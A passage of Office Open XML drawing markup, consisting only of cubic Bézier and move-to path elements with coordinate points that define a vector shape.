                    <a:pt x="277" y="23"/>
                    <a:pt x="277" y="23"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="277" y="23"/>
                    <a:pt x="277" y="23"/>
                    <a:pt x="277" y="23"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="277" y="23"/>
                    <a:pt x="277" y="23"/>
                    <a:pt x="277" y="23"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="277" y="23"/>
                    <a:pt x="277" y="23"/>
                    <a:pt x="277" y="23"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="277" y="23"/>
                    <a:pt x="277" y="23"/>
                    <a:pt x="277" y="23"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="278" y="24"/>
                    <a:pt x="278" y="24"/>
                    <a:pt x="278" y="24"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="275" y="24"/>
                    <a:pt x="274" y="22"/>
                    <a:pt x="272" y="22"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="272" y="22"/>
                    <a:pt x="272" y="22"/>
                    <a:pt x="272" y="22"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="272" y="23"/>
                    <a:pt x="272" y="24"/>
                    <a:pt x="273" y="24"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="273" y="25"/>
                    <a:pt x="274" y="25"/>
                    <a:pt x="274" y="25"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="274" y="25"/>
                    <a:pt x="274" y="25"/>
                    <a:pt x="274" y="25"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="285" y="38"/>
                    <a:pt x="295" y="55"/>
                    <a:pt x="304" y="75"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="318" y="75"/>
                    <a:pt x="331" y="75"/>
                    <a:pt x="343" y="74"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="343" y="73"/>
                    <a:pt x="343" y="72"/>
                    <a:pt x="343" y="72"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="344" y="72"/>
                    <a:pt x="344" y="72"/>
                    <a:pt x="345" y="72"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="345" y="72"/>
                    <a:pt x="345" y="72"/>
                    <a:pt x="345" y="72"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="346" y="72"/>
                    <a:pt x="346" y="72"/>
                    <a:pt x="346" y="72"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="346" y="72"/>
                    <a:pt x="346" y="72"/>
                    <a:pt x="346" y="72"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="347" y="72"/>
                    <a:pt x="347" y="72"/>
                    <a:pt x="347" y="72"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="347" y="72"/>
                    <a:pt x="347" y="72"/>
                    <a:pt x="347" y="72"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="347" y="72"/>
                    <a:pt x="347" y="72"/>
                    <a:pt x="347" y="72"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="349" y="72"/>
                    <a:pt x="349" y="72"/>
                    <a:pt x="350" y="72"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="350" y="72"/>
                    <a:pt x="350" y="72"/>
                    <a:pt x="350" y="72"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="352" y="72"/>
                    <a:pt x="353" y="72"/>
                    <a:pt x="355" y="72"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="354" y="71"/>
                    <a:pt x="354" y="71"/>
                    <a:pt x="354" y="70"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="353" y="69"/>
                    <a:pt x="353" y="69"/>
                    <a:pt x="353" y="69"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="354" y="69"/>
                    <a:pt x="354" y="69"/>
                    <a:pt x="355" y="70"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="357" y="68"/>
                    <a:pt x="358" y="72"/>
                    <a:pt x="360" y="73"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="360" y="73"/>
                    <a:pt x="361" y="73"/>
                    <a:pt x="361" y="73"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="361" y="72"/>
                    <a:pt x="361" y="72"/>
                    <a:pt x="361" y="71"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="361" y="71"/>
                    <a:pt x="361" y="71"/>
                    <a:pt x="363" y="72"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="363" y="71"/>
                    <a:pt x="363" y="71"/>
                    <a:pt x="363" y="71"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="363" y="71"/>
                    <a:pt x="363" y="71"/>
                    <a:pt x="363" y="71"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="364" y="72"/>
                    <a:pt x="364" y="72"/>
                    <a:pt x="365" y="72"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="364" y="71"/>
                    <a:pt x="364" y="71"/>
                    <a:pt x="363" y="70"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="363" y="70"/>
                    <a:pt x="363" y="70"/>
                    <a:pt x="363" y="70"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="362" y="70"/>
                    <a:pt x="361" y="69"/>
                    <a:pt x="361" y="69"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="361" y="68"/>
                    <a:pt x="361" y="68"/>
                    <a:pt x="361" y="68"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="361" y="68"/>
                    <a:pt x="361" y="68"/>
                    <a:pt x="361" y="68"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="360" y="65"/>
                    <a:pt x="360" y="65"/>
                    <a:pt x="360" y="65"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="360" y="64"/>
                    <a:pt x="359" y="63"/>
                    <a:pt x="359" y="61"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="359" y="61"/>
                    <a:pt x="359" y="61"/>
                    <a:pt x="359" y="61"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="360" y="61"/>
                    <a:pt x="360" y="61"/>
                    <a:pt x="360" y="61"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="360" y="61"/>
                    <a:pt x="360" y="61"/>
                    <a:pt x="360" y="61"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="360" y="60"/>
                    <a:pt x="360" y="60"/>
                    <a:pt x="360" y="60"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="360" y="60"/>
                    <a:pt x="360" y="60"/>
                    <a:pt x="360" y="60"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="361" y="61"/>
                    <a:pt x="363" y="61"/>
                    <a:pt x="363" y="62"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="364" y="63"/>
                    <a:pt x="364" y="63"/>
                    <a:pt x="364" y="63"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="365" y="64"/>
                    <a:pt x="366" y="65"/>
                    <a:pt x="366" y="65"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="366" y="64"/>
                    <a:pt x="365" y="61"/>
                    <a:pt x="365" y="61"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="366" y="61"/>
                    <a:pt x="366" y="61"/>
                    <a:pt x="366" y="61"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="365" y="61"/>
                    <a:pt x="365" y="61"/>
                    <a:pt x="363" y="58"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="363" y="57"/>
                    <a:pt x="363" y="57"/>
                    <a:pt x="363" y="57"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="364" y="57"/>
                    <a:pt x="364" y="57"/>
                    <a:pt x="364" y="57"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="365" y="58"/>
                    <a:pt x="365" y="58"/>
                    <a:pt x="365" y="58"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="365" y="59"/>
                    <a:pt x="365" y="59"/>
                    <a:pt x="365" y="59"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="366" y="60"/>
                    <a:pt x="370" y="65"/>
                    <a:pt x="370" y="65"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="371" y="67"/>
                    <a:pt x="371" y="70"/>
                    <a:pt x="372" y="72"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="373" y="72"/>
                    <a:pt x="374" y="72"/>
                    <a:pt x="376" y="72"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="375" y="71"/>
                    <a:pt x="374" y="70"/>
                    <a:pt x="374" y="69"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="373" y="68"/>
                    <a:pt x="373" y="68"/>
                    <a:pt x="373" y="68"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="372" y="67"/>
                    <a:pt x="372" y="67"/>
                    <a:pt x="372" y="67"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="373" y="67"/>
                    <a:pt x="373" y="67"/>
                    <a:pt x="374" y="68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374" y="66"/>
                    <a:pt x="374" y="66"/>
                    <a:pt x="374" y="66"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="374" y="66"/>
                    <a:pt x="374" y="66"/>
                    <a:pt x="375" y="67"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="376" y="67"/>
                    <a:pt x="376" y="67"/>
                    <a:pt x="376" y="67"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="376" y="67"/>
                    <a:pt x="376" y="67"/>
                    <a:pt x="375" y="65"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="375" y="65"/>
                    <a:pt x="375" y="65"/>
                    <a:pt x="375" y="65"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="376" y="65"/>
                    <a:pt x="376" y="65"/>
                    <a:pt x="376" y="65"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="376" y="65"/>
                    <a:pt x="377" y="65"/>
                    <a:pt x="377" y="65"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="379" y="67"/>
                    <a:pt x="379" y="67"/>
                    <a:pt x="380" y="67"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="379" y="65"/>
                    <a:pt x="376" y="64"/>
                    <a:pt x="376" y="61"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="376" y="61"/>
                    <a:pt x="376" y="61"/>
                    <a:pt x="376" y="61"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="376" y="60"/>
                    <a:pt x="374" y="57"/>
                    <a:pt x="373" y="56"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="374" y="56"/>
                    <a:pt x="374" y="56"/>
                    <a:pt x="375" y="56"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="376" y="57"/>
                    <a:pt x="376" y="57"/>
                    <a:pt x="376" y="57"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="375" y="56"/>
                    <a:pt x="375" y="55"/>
                    <a:pt x="374" y="55"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="374" y="54"/>
                    <a:pt x="374" y="54"/>
                    <a:pt x="372" y="53"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="371" y="52"/>
                    <a:pt x="371" y="52"/>
                    <a:pt x="369" y="51"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="368" y="50"/>
                    <a:pt x="368" y="50"/>
                    <a:pt x="366" y="49"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="366" y="49"/>
                    <a:pt x="366" y="49"/>
                    <a:pt x="365" y="49"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="365" y="49"/>
                    <a:pt x="365" y="49"/>
                    <a:pt x="365" y="49"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="364" y="48"/>
                    <a:pt x="364" y="48"/>
                    <a:pt x="364" y="48"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="364" y="47"/>
                    <a:pt x="364" y="47"/>
                    <a:pt x="364" y="47"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="365" y="48"/>
                    <a:pt x="365" y="48"/>
                    <a:pt x="365" y="48"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="365" y="48"/>
                    <a:pt x="365" y="48"/>
                    <a:pt x="365" y="48"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="365" y="47"/>
                    <a:pt x="364" y="46"/>
                    <a:pt x="362" y="44"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="361" y="44"/>
                    <a:pt x="360" y="44"/>
                    <a:pt x="360" y="43"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="360" y="43"/>
                    <a:pt x="360" y="43"/>
                    <a:pt x="364" y="45"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="364" y="45"/>
                    <a:pt x="364" y="45"/>
                    <a:pt x="364" y="45"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="365" y="46"/>
                    <a:pt x="365" y="46"/>
                    <a:pt x="367" y="47"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="367" y="47"/>
                    <a:pt x="367" y="47"/>
                    <a:pt x="367" y="47"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="368" y="48"/>
                    <a:pt x="369" y="48"/>
                    <a:pt x="370" y="49"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="370" y="49"/>
                    <a:pt x="370" y="49"/>
                    <a:pt x="370" y="49"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="370" y="49"/>
                    <a:pt x="370" y="49"/>
                    <a:pt x="368" y="47"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="368" y="47"/>
                    <a:pt x="368" y="47"/>
                    <a:pt x="368" y="47"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="367" y="46"/>
                    <a:pt x="367" y="46"/>
                    <a:pt x="364" y="44"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="365" y="44"/>
                    <a:pt x="365" y="44"/>
                    <a:pt x="365" y="44"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="365" y="45"/>
                    <a:pt x="365" y="45"/>
                    <a:pt x="365" y="45"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="364" y="44"/>
                    <a:pt x="362" y="42"/>
                    <a:pt x="362" y="42"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="71" y="69"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="71" y="69"/>
                    <a:pt x="71" y="69"/>
                    <a:pt x="71" y="69"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="71" y="68"/>
                    <a:pt x="70" y="68"/>
                    <a:pt x="69" y="68"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="69" y="68"/>
                    <a:pt x="69" y="68"/>
                    <a:pt x="69" y="68"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="69" y="68"/>
                    <a:pt x="69" y="68"/>
                    <a:pt x="68" y="70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9" y="71"/>
                    <a:pt x="69" y="71"/>
                    <a:pt x="69" y="70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1" y="69"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="78" y="70"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="76" y="69"/>
                    <a:pt x="74" y="69"/>
                    <a:pt x="73" y="69"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="72" y="69"/>
                    <a:pt x="72" y="70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2"/>
                    <a:pt x="69" y="72"/>
                    <a:pt x="69" y="73"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="69" y="73"/>
                    <a:pt x="69" y="74"/>
                    <a:pt x="68" y="74"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="68" y="75"/>
                    <a:pt x="68" y="75"/>
                    <a:pt x="68" y="75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7" y="76"/>
                    <a:pt x="66" y="77"/>
                    <a:pt x="66" y="78"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="65" y="79"/>
                    <a:pt x="65" y="79"/>
                    <a:pt x="64" y="80"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="64" y="80"/>
                    <a:pt x="64" y="80"/>
                    <a:pt x="64" y="80"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="63" y="81"/>
                    <a:pt x="63" y="81"/>
                    <a:pt x="63" y="81"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="63" y="82"/>
                    <a:pt x="64" y="82"/>
                    <a:pt x="64" y="82"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="65" y="81"/>
                    <a:pt x="66" y="79"/>
                    <a:pt x="67" y="79"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="67" y="79"/>
                    <a:pt x="67" y="79"/>
                    <a:pt x="67" y="79"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="67" y="80"/>
                    <a:pt x="67" y="80"/>
                    <a:pt x="67" y="80"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="67" y="80"/>
                    <a:pt x="67" y="80"/>
                    <a:pt x="67" y="80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9" y="78"/>
                    <a:pt x="69" y="78"/>
                    <a:pt x="70" y="77"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="71" y="77"/>
                    <a:pt x="71" y="77"/>
                    <a:pt x="71" y="77"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="71" y="76"/>
                    <a:pt x="71" y="76"/>
                    <a:pt x="72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2" y="75"/>
                    <a:pt x="72" y="74"/>
                    <a:pt x="73" y="74"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="74" y="73"/>
                    <a:pt x="75" y="71"/>
                    <a:pt x="78" y="70"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="110" y="176"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="116" y="138"/>
                    <a:pt x="127" y="103"/>
                    <a:pt x="142" y="74"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="135" y="74"/>
                    <a:pt x="128" y="74"/>
                    <a:pt x="121" y="73"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="105" y="73"/>
                    <a:pt x="93" y="72"/>
                    <a:pt x="84" y="70"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="83" y="70"/>
                    <a:pt x="83" y="70"/>
                    <a:pt x="82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0" y="72"/>
                    <a:pt x="80" y="72"/>
                    <a:pt x="80" y="73"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="80" y="73"/>
                    <a:pt x="80" y="73"/>
                    <a:pt x="83" y="72"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="83" y="73"/>
                    <a:pt x="83" y="73"/>
                    <a:pt x="78" y="77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78" y="77"/>
                    <a:pt x="78" y="77"/>
                    <a:pt x="78" y="77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9" y="74"/>
                    <a:pt x="79" y="74"/>
                    <a:pt x="79" y="74"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="77" y="76"/>
                    <a:pt x="70" y="82"/>
                    <a:pt x="70" y="84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9" y="84"/>
                    <a:pt x="69" y="84"/>
                    <a:pt x="69" y="84"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="68" y="84"/>
                    <a:pt x="68" y="84"/>
                    <a:pt x="65" y="87"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="65" y="87"/>
                    <a:pt x="65" y="87"/>
                    <a:pt x="65" y="87"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="65" y="86"/>
                    <a:pt x="65" y="86"/>
                    <a:pt x="66" y="84"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="64" y="85"/>
                    <a:pt x="60" y="87"/>
                    <a:pt x="60" y="87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0" y="86"/>
                    <a:pt x="60" y="86"/>
                    <a:pt x="61" y="85"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="61" y="85"/>
                    <a:pt x="61" y="85"/>
                    <a:pt x="61" y="85"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="60" y="85"/>
                    <a:pt x="60" y="85"/>
                    <a:pt x="60" y="85"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="59" y="85"/>
                    <a:pt x="59" y="85"/>
                    <a:pt x="59" y="85"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="59" y="85"/>
                    <a:pt x="59" y="85"/>
                    <a:pt x="58" y="87"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="57" y="87"/>
                    <a:pt x="57" y="87"/>
                    <a:pt x="57" y="87"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="57" y="86"/>
                    <a:pt x="57" y="86"/>
                    <a:pt x="58" y="85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60" y="83"/>
                    <a:pt x="60" y="83"/>
                    <a:pt x="60" y="83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61" y="83"/>
                    <a:pt x="65" y="79"/>
                    <a:pt x="65" y="79"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="64" y="79"/>
                    <a:pt x="64" y="79"/>
                    <a:pt x="64" y="79"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="64" y="79"/>
                    <a:pt x="64" y="79"/>
                    <a:pt x="62" y="80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3" y="79"/>
                    <a:pt x="63" y="79"/>
                    <a:pt x="64" y="78"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="64" y="78"/>
                    <a:pt x="65" y="77"/>
                    <a:pt x="65" y="77"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="65" y="75"/>
                    <a:pt x="67" y="74"/>
                    <a:pt x="68" y="73"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="67" y="74"/>
                    <a:pt x="64" y="76"/>
                    <a:pt x="64" y="76"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="64" y="77"/>
                    <a:pt x="64" y="77"/>
                    <a:pt x="64" y="77"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="62" y="79"/>
                    <a:pt x="60" y="81"/>
                    <a:pt x="58" y="83"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="58" y="83"/>
                    <a:pt x="58" y="83"/>
                    <a:pt x="58" y="83"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="57" y="84"/>
                    <a:pt x="57" y="84"/>
                    <a:pt x="57" y="85"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="56" y="86"/>
                    <a:pt x="56" y="86"/>
                    <a:pt x="55" y="87"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="55" y="87"/>
                    <a:pt x="54" y="88"/>
                    <a:pt x="54" y="88"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="54" y="88"/>
                    <a:pt x="54" y="88"/>
                    <a:pt x="54" y="88"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="53" y="88"/>
                    <a:pt x="53" y="88"/>
                    <a:pt x="53" y="88"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="53" y="88"/>
                    <a:pt x="53" y="88"/>
                    <a:pt x="53" y="88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51" y="89"/>
                    <a:pt x="50" y="90"/>
                    <a:pt x="49" y="91"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="49" y="91"/>
                    <a:pt x="49" y="91"/>
                    <a:pt x="49" y="91"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="49" y="91"/>
                    <a:pt x="49" y="91"/>
                    <a:pt x="49" y="91"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="49" y="91"/>
                    <a:pt x="48" y="91"/>
                    <a:pt x="48" y="92"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="48" y="92"/>
                    <a:pt x="48" y="92"/>
                    <a:pt x="48" y="92"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="47" y="93"/>
                    <a:pt x="47" y="94"/>
                    <a:pt x="46" y="94"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="46" y="95"/>
                    <a:pt x="46" y="95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2" y="98"/>
                    <a:pt x="42" y="99"/>
                    <a:pt x="41" y="100"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="40" y="101"/>
                    <a:pt x="40" y="101"/>
                    <a:pt x="40" y="101"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="40" y="101"/>
                    <a:pt x="39" y="102"/>
                    <a:pt x="39" y="103"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="39" y="102"/>
                    <a:pt x="39" y="102"/>
                    <a:pt x="39" y="102"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="39" y="102"/>
                    <a:pt x="39" y="101"/>
                    <a:pt x="39" y="101"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="40" y="101"/>
                    <a:pt x="40" y="101"/>
                    <a:pt x="40" y="101"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="39" y="101"/>
                    <a:pt x="39" y="102"/>
                    <a:pt x="38" y="102"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="37" y="104"/>
                    <a:pt x="37" y="104"/>
                    <a:pt x="37" y="104"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="37" y="105"/>
                    <a:pt x="37" y="105"/>
                    <a:pt x="37" y="105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36" y="105"/>
                    <a:pt x="36" y="105"/>
                    <a:pt x="37" y="104"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="36" y="105"/>
                    <a:pt x="36" y="105"/>
                    <a:pt x="35" y="106"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="35" y="106"/>
                    <a:pt x="35" y="107"/>
                    <a:pt x="35" y="107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34" y="109"/>
                    <a:pt x="33" y="110"/>
                    <a:pt x="33" y="111"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="32" y="112"/>
                    <a:pt x="31" y="113"/>
                    <a:pt x="31" y="114"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="27" y="122"/>
                    <a:pt x="27" y="122"/>
                    <a:pt x="25" y="126"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="24" y="126"/>
                    <a:pt x="24" y="126"/>
                    <a:pt x="24" y="126"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="24" y="127"/>
                    <a:pt x="24" y="127"/>
                    <a:pt x="24" y="127"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="24" y="126"/>
                    <a:pt x="24" y="125"/>
                    <a:pt x="25" y="125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5" y="123"/>
                    <a:pt x="25" y="123"/>
                    <a:pt x="25" y="123"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="25" y="123"/>
                    <a:pt x="25" y="123"/>
                    <a:pt x="25" y="123"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="22" y="130"/>
                    <a:pt x="17" y="141"/>
                    <a:pt x="14" y="149"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="150"/>
                    <a:pt x="13" y="150"/>
